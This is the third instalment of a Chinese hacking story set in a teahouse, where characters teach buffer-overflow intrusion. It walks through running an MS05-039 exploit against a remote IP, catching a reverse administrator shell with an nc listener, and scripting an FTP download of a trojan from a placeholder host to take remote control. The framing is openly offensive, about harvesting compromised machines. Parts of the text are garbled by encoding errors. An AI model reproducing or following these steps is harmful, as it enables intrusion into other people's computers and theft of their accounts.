木馬害人計(jì)中計(jì)連載３

自從進(jìn)入三月份以來(lái)，綿綿細(xì)雨就一直下個(gè)不停。這也難怪，古詩(shī)早有“清明時(shí)節(jié)雨紛紛，路上行人欲斷魂”的描述。無(wú)聊之中，劉鼎抱著筆記本電腦又來(lái)到了茶館，準(zhǔn)備殺殺時(shí)間?？赡苁怯捎谙掠甑脑?。茶館里少了一些平時(shí)的喧囂。

茶博士說(shuō)“計(jì)”

劉鼎要了一碗茶，獨(dú)自坐在桌旁注視著外面的細(xì)雨。這時(shí)有人拍他的肩膀，劉鼎抬頭一看原來(lái)是茶博士沖茶來(lái)了，茶博士笑道：“小兄弟，又在等公孫先生呢?”劉鼎笑笑沒(méi)有回答。茶博士接著說(shuō)道：“既然公孫先生不在，那么今天我們兄弟來(lái)切磋切磋怎么樣?”劉鼎抬頭好好地打量了茶博士一番，質(zhì)疑道：“你也會(huì)玩木馬捉肉雞?”茶博士又笑道：“這話(huà)說(shuō)的，我們跑江湖的，什么都要略知一二。趁今天茶館人少，我也沒(méi)啥忙的，我來(lái)給你講一講三十六計(jì)中的趁火打劫之計(jì)吧!”

劉鼎深知這茶館是藏龍臥虎之地，于是便說(shuō)：“那就麻煩兄弟給我講一講?”茶博士坐下喝了一口茶潤(rùn)了潤(rùn)嗓子：“此計(jì)原文為‘?dāng)持Υ螅蛣?shì)取利，剛決柔也。’”這意思是說(shuō)，當(dāng)對(duì)手遇到麻煩或危難時(shí)，要乘機(jī)出擊，制服對(duì)手。而“‘鷸蚌相爭(zhēng)，漁翁得利’也就是趁火打劫的形象體現(xiàn)?！?/p>

認(rèn)識(shí)緩沖區(qū)溢出攻擊

“說(shuō)得不錯(cuò)，那么這一計(jì)在網(wǎng)絡(luò)中怎么使用呢?”劉鼎問(wèn)道。“在現(xiàn)實(shí)的網(wǎng)絡(luò)安全中，這種趁火打劫的現(xiàn)象也不在少數(shù)。最典型的，就是當(dāng)用戶(hù)的系統(tǒng)或軟件存在某些漏洞以后，黑客利用這些漏洞種植木馬，竊取用戶(hù)資料的行為。我想不用多說(shuō)你也明白，這里的‘火’是指各種各樣的漏洞，而‘打劫’就是指黑客利用木馬去偷取用戶(hù)的網(wǎng)絡(luò)游戲或網(wǎng)上銀行等東西的賬號(hào)”茶博士答道。

“兄弟說(shuō)得不錯(cuò)啊!”這時(shí)一個(gè)熟悉的聲音從劉鼎身后傳來(lái)，劉鼎回頭一看，是公孫牧。茶博士起身笑著說(shuō)：“哪能跟你相比啊，我也就是班門(mén)弄斧而已。來(lái)，我去給你沏茶，你接著給我們講講”。公孫牧坐下后，說(shuō)：“謝了兄弟!那我接著你的說(shuō)啊。近年來(lái)，絕大多數(shù)黑客的攻擊行為都是利用緩沖區(qū)溢出漏洞進(jìn)行的。而這類(lèi)緩沖區(qū)溢出攻擊太簡(jiǎn)單太容易實(shí)現(xiàn)了它可以使任何人獲得遠(yuǎn)程電腦的完全控制權(quán)，危害十分嚴(yán)重。這個(gè)緩沖區(qū)溢出漏洞，是因?yàn)槌绦騿T在編寫(xiě)程序時(shí)未檢查內(nèi)存空間，致使內(nèi)存泄漏引起的?！?/p>

劉鼎聽(tīng)了，好奇地問(wèn)道：“那么這個(gè)緩沖區(qū)溢出攻擊如何實(shí)現(xiàn)呢?”公孫牧答道：“這類(lèi)攻擊一般分為三步。首先是利用溢出工具進(jìn)行溢出操作，接著在獲得的Shell中上傳木馬，然后再通過(guò)木馬進(jìn)行控制。其實(shí)像‘沖擊波’，‘震蕩波’這樣的蠕蟲(chóng)病毒，傳播方式大致也是這樣的?！贝藭r(shí)，茶博七端茶過(guò)來(lái)，邊坐下邊說(shuō)：“公孫先生，還是實(shí)際操作操作吧，免得人家小兄弟說(shuō)你光說(shuō)不練假把式!”

實(shí)戰(zhàn)演練

公孫牧哈哈一笑：“行!那么我們就來(lái)操練操練。我告訴你們，利用漏洞對(duì)遠(yuǎn)程電腦進(jìn)行攻擊，首先要看懂相關(guān)漏洞利用工具的使用方法。以《ms05039漏洞利用工具》為例，打開(kāi)命令提示符窗口，執(zhí)行此工具后查看其使用方法?！?/p>

“工具是通過(guò)反彈連接的形式進(jìn)行遠(yuǎn)程數(shù)據(jù)溢出的。比如在命令提示符窗口中執(zhí)行‘ms05039192.168.0.3 192.168.0.22008.’當(dāng)遠(yuǎn)程數(shù)據(jù)的溢出操作成功執(zhí)行后，它會(huì)出現(xiàn)溢出成功的提示，此時(shí)就需要馬上通過(guò)nc來(lái)監(jiān)聽(tīng)反彈連接到本地2008端口的數(shù)據(jù)。這只要再開(kāi)啟一個(gè)命令提示符窗口，輸入命令‘nc-vv-1-p 2008’即可。很快我們就可以在這個(gè)監(jiān)聽(tīng)窗口中得到一個(gè)擁有管理員權(quán)限的遠(yuǎn)程Shell了?！惫珜O牧仔細(xì)講解道。

劉鼎邊琢磨邊問(wèn)“那，現(xiàn)在是不是應(yīng)該上傳木馬了呢?”公孫牧說(shuō)：“的確是這樣。成功獲得遠(yuǎn)程主機(jī)的Shell后，可以通過(guò)FTP或TFTP等網(wǎng)絡(luò)協(xié)議將木馬程序上傳到遠(yuǎn)程電腦中。比如‘狙擊波’病毒在成功獲得一個(gè)Shell后，會(huì)釋放一個(gè)2PAC TXT文件。該文件中包含一段FTP命令腳本，可開(kāi)啟FTP服務(wù)，提供病毒文件下載功能?！?/p>

就在這個(gè)時(shí)候，茶館跑堂的從遠(yuǎn)處跑來(lái)，邊跑邊對(duì)茶博士喊道：“你怎么在這兒啊?著實(shí)讓我好找。那邊兒客人多起來(lái)了趕緊走吧!”此刻茶博士只好起身作揖：“二位不好意思，我開(kāi)工了，告辭告辭!”劉鼎和公孫牧哈哈笑了起來(lái)。然后劉鼎接著問(wèn)：“今天先生準(zhǔn)備采用什么方式上傳木馬呢?”公孫牧想了想說(shuō)：“今天就采用FTP協(xié)議上傳吧?，F(xiàn)在切換到我們剛剛得到的Shell窗口，依次輸入以下控制命令。此命令的意思是從ftp.xxx.net這個(gè)網(wǎng)站，利用user和123456這個(gè)賬號(hào)密碼，下載muma.exe這個(gè)木馬文件?！?/p>

公孫牧接著講：“成功輸入這些命令后，就會(huì)在遠(yuǎn)程電腦中建立一個(gè)名為mmtxt的文件。然后輸入‘ftp-s：mmtxt’命令，等‘會(huì)兒就可以通過(guò)FTP協(xié)議將木馬文件放到遠(yuǎn)程電腦里面了。下面我們輸入‘dir muma exc’查看木馬文件是否已經(jīng)成功上傳到遠(yuǎn)程電腦中。確認(rèn)以后，通過(guò)木馬文件我們就能對(duì)遠(yuǎn)程電腦進(jìn)行圖形化的操作控制了?！?/p>

尾聲

說(shuō)話(huà)間，外面的綿綿細(xì)雨已經(jīng)停下了呼吸著雨后略帶泥土味的空氣，感覺(jué)特別舒服。這時(shí)劉鼎一看到吃飯時(shí)間了，于是想請(qǐng)公孫牧吃頓飯。公孫牧則連連擺手說(shuō)：“不用了，不用了!有事先走一步?！蓖珜O牧的背影，劉鼎期待著下一次的相遇。欲知后事如何，請(qǐng)看下回分解。